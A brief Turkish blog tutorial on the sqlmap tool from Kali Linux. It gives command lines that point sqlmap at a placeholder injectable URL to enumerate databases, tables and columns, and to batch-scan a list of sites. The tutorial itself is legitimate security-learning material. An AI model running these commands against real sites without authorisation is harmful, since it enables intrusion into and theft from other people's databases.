Kali Linux Tools – Sqlmap

Sqlmap web sitelerinde kodlamada yapılmış hatalardan faydalanarak web sitesinin veritabanının kolonlarına kadar erişmemizi sağlayan ve python dili ile yazılmış zafiyet aracıdır.Bünyesinde barındırdığı özellikler sayesinde, veri tabanı sunucularının yönetimini ele geçirmekten hedef sunucunun işletim sisteminde komut çalıştırmaya kadar pek çok işlevi yerine getirebilmektedir. Birçok veri tabanı yönetim sistemi için desteği bulunan sqlmap aracını şu bağlantıdan indirebilirsiniz.

https://github.com/sqlmapproject/sqlmap

Öncelikle site de kodlamadan kaynaklı hata olan ve ya olabileceğini düşündüğünüz linkten yola çıkarak -dbs parametresini kullanıyoruz.Bu parametre ile mevcut veritabanlarını parse edeceğiz.

sqlmap -u “http://testsite.com/eng/scheda.php?id=51” –dbs

sqlmap -u “http://testsite.com/eng/scheda.php?id=51” -D database_name –tables
Kodu ile seçili veritabanındaki tabloları listeliyoruz.

sqlmap -u “http://testsite.com/eng/scheda.php?id=51” -T table_name –columns

Kodu ile seçili tablonun kolonlarını listeliyoruz.

 

Ayrıca sqlmap -m “sitelist.txt” kodu ile setelist.txt dosyasına yazılmış urlleri sırayla tarar.

Bir sonraki yazıda görüşmek üzere

 

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir